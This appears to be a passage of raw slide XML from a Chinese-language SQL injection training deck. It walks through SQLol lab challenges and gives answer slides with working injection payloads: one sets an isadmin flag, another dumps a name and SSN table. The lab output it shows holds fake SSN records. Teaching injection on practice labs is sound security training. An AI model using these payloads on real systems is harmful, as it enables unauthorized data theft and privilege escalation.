          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>union,select,where,and,or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,--,#</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>全部返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，错误</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查询语句</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2036611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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="836712"/>
            <a:ext cx="10972800" cy="5145435"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>myadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>', </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>isadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=1 where id=3 #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Array ( [username] =&gt; Chunk MacRunfast:666-67-6776 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Herp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Derper:012-34-5678 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Array ( [username] =&gt; Peter Weiner:111-22-3333 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SlapdeBack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> LovedeFace:999-99-9999 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Array ( [username] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Wengdack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Slobdegoob:000-00-1112 ) </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="593093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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>mcir.pte.com/sqlol/challenges/challenge10.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：找到社会安全码表，显示内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>列注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>GET</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>无过滤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>全部返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>无</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>错误</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查询语句</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169822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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="836712"/>
            <a:ext cx="10972800" cy="5145435"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>,':',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t> ( [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>,':',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>)] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Wengdack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t> Slobdegoob:000-00-1112 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t> ( [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>,':',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>)] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Herp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t> Derper:012-34-5678 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t> ( [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>,':',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>)] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Peter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t> Weiner:111-22-3333 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t> ( [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>,':',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>)] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t> MacRunfast:666-67-6776 ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t> ( [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>,':',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>)] =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SlapdeBack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t> LovedeFace:999-99-9999 ) </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1962510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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>mcir.pte.com/sqlol/challenges/challenge12.php</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>要求：反弹式</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
